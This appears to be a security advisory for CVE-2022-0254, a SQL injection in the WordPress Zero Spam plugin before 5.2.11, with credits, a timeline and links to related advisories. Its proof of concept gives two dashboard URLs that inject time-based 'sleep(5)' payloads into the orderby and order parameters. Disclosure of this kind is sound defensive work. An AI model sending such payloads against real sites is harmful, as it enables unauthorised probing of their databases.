Zero Spam < 5.2.11 – Admin+ SQL Injection | CVE 2022-0254 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection

Proof of Concept

With at least one IP in the “Blocked IPs” list:

https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5)
https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)

Affects Plugins

Fixed in 5.2.11

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2660225

URL

https://plugins.trac.wordpress.org/changeset/2680906

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

ae54681f-7b89-408c-b0ee-ba4a520db997

Timeline

Publicly Published

2022-02-18 (about 2 years ago)

Added

2022-02-18 (about 2 years ago)

Last Updated

2022-09-26 (about 1 years ago)

Other

Published

Title

Published

2023-11-13

Title

Easy Newsletter Signups <= 1.0.4 - Admin+ SQLi

Published

2017-05-21

Title

Surveys 1.01.8 - Authenticated SQL Injection

Published

2022-05-09

Title

Logo Slider <= 1.4.8 - Admin+ SQLi

Published

2019-03-15

Title

Better Search 2.2.2 - Unauthenticated SQL Injection

Published

2021-04-05

Title

Simple Membership < 4.0.4 - Authenticated SQL Injections